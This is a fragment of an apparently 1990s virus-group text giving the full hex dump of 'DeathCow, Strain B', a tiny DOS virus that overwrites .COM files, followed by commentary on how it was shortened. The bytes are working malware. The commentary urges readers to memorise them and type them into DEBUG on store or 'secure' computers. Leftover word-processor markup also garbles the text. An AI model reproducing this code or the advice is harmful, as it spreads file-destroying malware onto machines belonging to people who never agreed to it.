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DeathCow, Stra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The DEBUG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DEBUG dump for DeathCow, Strain B.  Note that it is fou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DeathCow (grand total:  42 bytes).  I changed the MOV BX,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CHG BX,AX (saving one byte), the INT 020h to RET (another byte saved)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the MOV CL,020h (saves two more bytes, for a total of f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                 Hex Values        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-----------------------------------------------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F2A:0100  B4 4E BA 24 01 CD 21 B8-01 3D BA 9E 00 CD 21 93   .N.$..!..=....!.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3F2A:0110  B4 40 B1 2A BA 00 01 CD-21 B4 3E CD 21 B4 4F CD   .@.*....!.&gt;.!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F2A:0120  21 73 E4 C3 2A 2E 43 4F-4D 00                     !s..*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Commentary by Nowhere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lame virus:  it doesn't even do any real damage, and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file date or time.   I still think that this should be called a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, because it doesn't really do much.  It will reinfect the s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d over and won't work on write-protected files.  Of course, tro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O DAMAGE, but that's another story.  Well, at least it's s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memorize the forty-two bytes under Hex Values and typ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(using the "E" command) on computers that have their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/removed (great for "secure" computers or computers in retail st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Guido Sanchez for providing me with the original DeathCow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y virus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here Man, [NuKE] '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